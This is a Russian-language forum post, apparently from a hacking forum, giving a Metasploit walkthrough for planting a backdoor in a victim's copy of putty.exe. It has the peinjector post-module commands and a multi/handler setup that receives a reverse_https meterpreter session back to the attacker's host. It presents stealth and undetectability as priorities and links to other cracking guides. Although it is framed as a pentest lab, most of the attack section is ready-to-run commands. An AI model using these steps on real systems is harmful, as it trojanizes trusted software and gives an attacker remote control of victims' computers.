Загрузка...

Metasploit для Pentester: Ввод полезной нагрузки в исполняемый файл

Тема в разделе Kali Linux создана пользователем TomMuller 13 сен 2021. (поднята 13 сен 2021) 861 просмотр

Загрузка...
  1. TomMuller
    TomMuller Автор темы 13 сен 2021 swatter 44 16 авг 2021
    Скрытность и необнаруживаемость - приоритет после анонимности. В этой статье мы узнаем, как создать безобидно выглядящий бэкдор и связать его с легитимным исполняемым файлом, чтобы завоевать доверие жертвы.

    Предварительные условия для создания лаборатории
    Поиск исполняемого файла на ПК жертвы
    Использование полезной нагрузки peinjector для связывания с исполняемым файлом.

    Необходимые условия для проведения лабораторной работы.
    Kali Linux (машина пентестера)
    Машина Windows 10 (машина жертвы)

    Поиск исполняемого файла на ПК жертвы
    Начнем. Существует множество методов получения сессии meterpreter на целевой машине, поэтому вы можете использовать любой метод для получения сессии на ПК жертвы. У нас уже есть сессия meterpreter на ПК жертвы.

    Здесь наш подход заключается в поиске исполняемых файлов, существующих на ПК жертвы, чтобы мы могли связать полезную нагрузку с легитимными исполняемыми файлами, которые будут выглядеть для пользователя как обычные.

    Мы исследуем различные пути и диски ПК жертвы и вдруг в загрузках находим файл putty.exe.
    [IMG]
    Введение модуля Peinjector
    Этот модуль вставит указанную полезную нагрузку Windows в целевой исполняемый файл.

    Поскольку мы знаем, что жертва использует putty.exe, который сейчас находится в загрузках, следующим шагом будет введение в него полезной нагрузки. Чтобы запустить этот модуль, нам нужно установить targetpe, что означает путь к целевому исполняемому файлу компьютера жертвы, в который необходимо ввести полезную нагрузку.
    Код
    use post/windows/manage/peinjector
    msf6 post(windows/manage/peinjector) > set targetpe C:\\Users\\ignite\\Downloads\\putty.exe
    msf6 post(windows/manage/peinjector) > set session 1
    msf6 post(windows/manage/peinjector) > set lhost 192.168.1.2
    msf6 post(windows/manage/peinjector) > set lport 443
    msf6 post(windows/manage/peinjector) > exploit
    Теперь он сгенерирует полезную нагрузку и введет ее в целевой исполняемый файл exe. т.е. putty.exe
    [IMG] Полезная нагрузка уже была введена на предыдущем шаге, теперь пришло время восстановить соединение на нашей машине с помощью мульти-обработчика.
    Код
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
    msf6 exploit(multi/handler) > set lhost 192.168.1.2
    msf6 exploit(multi/handler) > set lport 443
    msf6 exploit(multi/handler) > exploit
    [IMG]Поскольку жертва не знает о бэкдоре, создаваемом полезной нагрузкой peinjector, всякий раз, когда жертва пытается использовать putty.exe, который будет выглядеть для него законным, он также не заметит никаких изменений в функциональности putty.
    [IMG]
    Как только жертва нажимает на значок замазки, она ничего не заметит, но в фоновом режиме полезная нагрузка выполняется, и мы получаем сеанс.

    [IMG]
    *Мои другие статьи.
    Взлом баз данных MySQL с помощью Metasploit.
    https://zelenka.guru/threads/2948735/
    Взлом FTP-сервера с помощью Kali Linux.
    https://zelenka.guru/threads/2950499/

    Постэксплуатация - Переадресация портов.
    https://zelenka.guru/threads/2951953/
    Как узнать пароль взломанных адресов электронной почты с помощью OSINT
    https://zelenka.guru/threads/2950762/
     
Top